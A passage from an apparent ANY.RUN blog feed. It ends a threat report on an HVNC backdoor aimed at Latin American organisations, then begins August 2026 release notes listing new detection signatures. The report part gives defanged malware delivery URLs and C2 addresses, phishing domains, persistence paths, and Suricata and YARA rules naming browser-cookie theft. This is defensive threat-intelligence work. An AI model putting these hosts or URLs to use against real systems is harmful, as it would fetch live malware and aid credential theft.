                                        Secondary delivery / co-hosted phishing                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D7"
                    data-col-index="3"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        receitafederal.digital                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Domain                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        NFe-themed delivery lure domain                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D8"
                    data-col-index="3"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        aapj.digital                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Domain                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Banco do Brasil PJ phishing clone (co-hosted, GHOSTnet)                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D9"
                    data-col-index="3"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Medium (cluster link)                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        gerenciadorcaixa.digital                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Domain                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Caixa Econômica Federal phishing clone — same gerenciador[banco].digital naming convention as aapj.digital                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D10"
                    data-col-index="3"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Medium-High (cluster link, 2nd independent confirmation)                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        hxxp://5[.]230[.]249[.]49/dl[.]php?f=cresol[.]exe&k=chave_tecl_cresol                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        URL                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Additional stage-2 delivery URL on the C2 host, Sicredi/Cresol-themed lure variant                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D11"
                    data-col-index="3"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        hxxp://5[.]230[.]249[.]49/dl[.]php?f=payed[.]exe                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        URL                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Additional stage-2 delivery URL on the C2 host, generic-themed lure variant                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D12"
                    data-col-index="3"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        hxxp://40[.]124[.]169[.]27/dl[.]php?f=NotaFiscal...&k=nfe_valid_access_key_2026_secure                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        URL                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Stage-2 delivery URL, NFe-themed (confirmed twice, 08 Jul and 15 Jul 2026)                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D13"
                    data-col-index="3"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A14"
                    data-col-index="0"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        nfe_valid_access_key_2026_secure / chave_tecl_cresol                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B14"
                    data-col-index="1"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        URL parameter values                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C14"
                    data-col-index="2"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Delivery-server access tokens — the k=parameter naming pattern (chave_/key_ + lure theme) is a strong kit/campaign pivot independent of the current staging IP                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D14"
                    data-col-index="3"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        High                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A15"
                    data-col-index="0"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        0a4b2aff1c2ebf8b                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B15"
                    data-col-index="1"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        HTML comment string                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C15"
                    data-col-index="2"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Phishing kit build/campaign marker on the DocuSign lure page                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D15"
                    data-col-index="3"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Medium                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-379'>
table#wpdtSimpleTable-379{ table-layout: fixed !important; }
table#wpdtSimpleTable-379 td, table.wpdtSimpleTable379 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">Host-Based Indicators:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-378"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="11"
           data-wpID="378"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Indicator                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Notes                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        %USERPROFILE%\Desktop\%USERNAME%.exe                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Stage-3 drop path/filename pattern (dynamic per victim; observed as admin.exe in the 2nd captured build)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        LNK filename patterns: Comprovante_NFe*.lnk / NF_Eletronica*.lnk                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Stage-2 dropper naming convention - confirmed rotating across at least two templates                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        LNK Machine ID: servee                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Correlates to Azure staging host NetBIOS name (build 1)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        LNK Volume Serial: 0x24E4EC72                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Builder-host pivot for other LNKs from the same kit (build 1)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        %APPDATA%\Roaming\Programs\Common\AppUpdateHelper.exe                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence copy of the final payload (confirmed, Section 8.5.3)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AppUpdateHelper.lnk                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence shortcut (Startup folder, T1547.001)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Mutex prefix pattern: Global\AppUpdateHelper_* / Global\WinSvc_*                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Confirmed via two independent builds (07 Apr and 02 Apr 2026 submissions); suffix is per-build/random, prefix is stable - use regex Global\\(AppUpdateHelper|WinSvc)_[A-F0-9]+ for hunting                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Alternate final-payload filename: SysMaintenance.exe (folder: SystemMaintenance)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Confirms binary/folder naming rotates alongside the AppUpdateHelper/UpdateAssistant convention                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Suricata: “hunting [any.run] windows pc hostname observed in outbound connection” (T1592)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        The C2 beacon appears to transmit the victim hostname during handshake - not yet confirmed via static code review                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Suricata: “suspicious [any.run] possible admin username observed in outbound connection” (T1571)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        The C2 beacon appears to transmit the victim username during handshake - not yet confirmed via static code review                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-378'>
table#wpdtSimpleTable-378{ table-layout: fixed !important; }
table#wpdtSimpleTable-378 td, table.wpdtSimpleTable378 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">Suricata (network-content, infrastructure-independent):</p>



<p class="wp-block-paragraph">alert tcp any any -&gt; any any (msg:&#8221;HVNC-family C2 handshake (NFe/DocuSign cluster)&#8221;; \<br> content:&#8221;HVNC-&#8220;; content:&#8221;CLIENT_ID:HVNC-&#8220;; content:&#8221;COMPUTER:&#8221;; \<br> content:&#8221;IDENTIFIER_CHANNEL:&#8221;; content:&#8221;VERSION:1.2.0.4.71&#8243;; \<br> flow:established,to_server; classtype:trojan-activity; sid:9000001; rev:1;)</p>



<p class="wp-block-paragraph">YARA (final payload):</p>



<p class="wp-block-paragraph">rule Trojan_HVNC_UpdateAssistant_Masquerade<br>{<br>    meta:<br>        description = &#8220;Detects the unsigned HVNC/keylogger backdoor masquerading as Windows Update Assistant&#8221;<br>        author = &#8220;0xOlympus&#8221;<br>        date = &#8220;2026-07-27&#8221;<br>        hash = &#8220;5fbfc7929858c3c3d79637db857525695db3c0f41b9bf2a7b964c26b7226bde3&#8221;<br><br>    strings:<br>        $ff1 = &#8220;cookies.sqlite&#8221; ascii<br>        $ff2 = &#8220;places.sqlite&#8221; ascii<br>        $ff3 = &#8220;permissions.sqlite&#8221; ascii<br><br>        $av1 = &#8220;avastui.exe&#8221; ascii<br>        $av2 = &#8220;bdagent.exe&#8221; ascii<br>        $av3 = &#8220;mcshield.exe&#8221; ascii<br>        $av4 = &#8220;360tray.exe&#8221; ascii<br>        $av5 = &#8220;ekrn.exe&#8221; ascii<br><br>        $ver = &#8220;Windows Update Assistant&#8221; wide<br><br>        // XOR(0x37)-encoded C2 host &#8220;5.230.249.49&#8221;<br>        $c2cfg = { 02 19 05 04 07 19 05 03 0E 19 03 0E }<br><br>    condition:<br>        uint16(0) == 0x5A4D and<br>        (2 of ($ff*)) and<br>        (3 of ($av*)) and<br>        ($ver or $c2cfg)<br>}</p>
<p>The post <a href="https://any.run/cybersecurity-blog/hvnc-backdoor-targets-latam/">HVNC Backdoor Targets LATAM Organizations with Fake Tax and DocuSign Lures</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/hvnc-backdoor-targets-latam/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Release Notes: Faster TI Investigations, Fresh Threat Research, and 650+ Threat Coverage Updates</title>
		<link>https://any.run/cybersecurity-blog/release-notes-august-2026/</link>
					<comments>https://any.run/cybersecurity-blog/release-notes-august-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 03 Sep 2026 09:11:42 +0000</pubDate>
				<category><![CDATA[Service Updates]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[update]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22977</guid>

					<description><![CDATA[<p>Security teams need threat intelligence that helps them move quickly from a suspicious indicator to the context, evidence, and next action. ANY.RUN’s August updates focus on making that process faster and more practical, while expanding detection coverage across host, file, and network activity. The release brings a more connected Threat Intelligence Lookup experience, broader threat [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/release-notes-august-2026/">Release Notes: Faster TI Investigations, Fresh Threat Research, and 650+ Threat Coverage Updates</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Security teams need threat intelligence that helps them move quickly from a suspicious indicator to the context, evidence, and next action. <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>’s August updates focus on making that process faster and more practical, while expanding detection coverage across host, file, and network activity. </p>



<p class="wp-block-paragraph">The release brings a more connected <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> experience, broader threat coverage, and new research on active campaigns and emerging malware, giving analysts more context to investigate threats, reduce manual work, and act with greater confidence. </p>



<h2 class="wp-block-heading">Product Updates </h2>



<p class="wp-block-paragraph">This month’s product update focuses on making threat intelligence easier to investigate and act on. Threat Intelligence Lookup now gives analysts a clearer path from a single indicator to related infrastructure, relevant observables, and the next step in the investigation. </p>



<h3 class="wp-block-heading">New Connections Block in TI Lookup for Faster Threat Investigation </h3>



<p class="wp-block-paragraph"><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> now makes it much easier to move from a single indicator to the wider network context around it. Instead of piecing together separate results, analysts can quickly follow related observables, focus on what matters, and move from a TI query to the next investigation step with less manual work. </p>



<p class="wp-block-paragraph">The <strong>Domains, IPs, and URLs</strong> tabs have also been updated to make related observables easier to explore and pivot between. Whitelisted data is hidden by default, helping analysts focus on potentially relevant activity without legitimate infrastructure crowding the results. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Connections-1024x586.png" alt="TI Lookup Connections" class="wp-image-22984" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Connections-1024x586.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Connections-300x172.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Connections-768x439.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Connections-1536x879.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Connections-2048x1172.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Connections-370x212.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Connections-270x154.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Connections-740x423.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup Connections bringing related observables into one investigation view</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Analysts can also export filtered results in <strong>JSON</strong>, so selected observables can be reused for retrohunting, checked against SIEM/NDR data, added to blocking workflows, or passed to Detection Engineering for further action. </p>



<p class="wp-block-paragraph">Instead of stopping at a verdict or a list of indicators, analysts can now use TI Lookup to: </p>



<ul class="wp-block-list">
<li>pivot faster between URLs, domains, and IPs; </li>



<li>focus on malicious and unknown relationships with less noise; </li>



<li>uncover related infrastructure and build a clearer investigation picture; </li>



<li>prepare a relevant set of observables for retrohunting and further analysis;</li>



<li>move findings into blocking and detection workflows without rebuilding the dataset manually. </li>
</ul>



<p class="wp-block-paragraph">For SOC and security leaders, the value goes beyond saving analysts a few clicks. Connections shortens the path from a suspicious indicator to an actionable set of findings, reducing manual correlation and helping teams move faster into retrohunting, blocking, and detection updates. That supports <strong>lower time per case, higher analyst throughput, faster Time-to-IOC and Time-to-Block, lower MTTD and MTTR, and stronger detection coverage.</strong></p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Reduce the time between detection and response.</span> 
<br>
Support lower MTTD and MTTR across the SOC.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=release-notes-august-2026&#038;utm_term=030926&#038;utm_content=linktoenterprise#contact-sales " rel="noopener" target="_blank">
Improve SOC Performance </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Threat Coverage Updates </h2>



<p class="wp-block-paragraph">Detection got a major boost this month, with <strong>81 new behavior signatures, 16 YARA rules, and 559 Suricata rules </strong>added across ANY.RUN. Together, they strengthen coverage from malware execution and file analysis to phishing, network activity, and command-and-control traffic. </p>



<h3 class="wp-block-heading">New Behavior Signatures </h3>



<p class="wp-block-paragraph">The latest signature additions focus on malware families analysts are likely to encounter across real-world investigations, from loaders and stealers to RATs, ransomware, and mobile threats. Coverage now extends across Windows, Linux, macOS, and Android, giving analysts more context directly from observed behavior during analysis. </p>



<div class="wp-block-group is-layout-grid wp-container-core-group-is-layout-9d260ee2 wp-block-group-is-layout-grid">
<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/b7f1eecb-fbf9-4228-87cf-ca17206f032b?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">TonLoader</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/6025e649-0397-42da-8609-5abb4ea4f077?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ShardLoader</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/fcea6463-598a-4106-8329-d07c0c30fdf8/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Ramnit</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/4ab62fd0-36db-43c8-ab15-77a81e84e4a3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">SalatStealer</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/985e874d-33a1-4714-aa6f-8052a43c89d3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">LKR</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/aadb90cb-e3e2-4fbf-a873-3013be0b22ea?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">BlackSee</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/360afc21-261b-412f-b281-5d98e3c286c8?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ValleyRAT</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/bc2ccfc6-cf6c-4f5f-a7fe-647d0314d169?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Phantom</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/810c6f62-1568-4cff-8935-5242e7449df4?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">PureLogs</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/47112753-3136-4841-b470-29002e601152?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">DeviceManager</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/9a7aab38-a006-4f5f-ac67-500af1423b4c?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">AnimateClipper</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/381ae6fc-2f85-4d49-93e5-869018696672?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">NWHStealer</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/388a6647-7f02-45c7-a26c-dc7f9ce60251?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">OverLord</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/73a836bc-d189-441c-ac02-695da7bbc9b4?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">IraHook</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/ec02db21-d258-4ad5-a0aa-dcf8d7141f47?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Vidar</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/13a47e0d-35ff-4b6a-8181-baadbec27d1c?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Rulftfl</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/474be3ee-cf3a-4877-bacc-75e2ff53c42a?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">RanEnc</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/7f776f87-4257-4916-9bfe-0759f39f1912?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">NeptuneRAT</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/4c3bd52f-613a-4974-a5b2-944be29093d2?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">SysTex</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/bc043cca-ff7e-4c48-aa02-db6423e35db4?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">StormSer</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/9cca89b2-6434-4eed-b9cb-4af2b7b1a138?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">XLoader</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/8477e3b5-4bf9-4dec-9631-6acd3f871668?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Kutaki</a> </li>
</ul>



<ul class="wp-block-list">
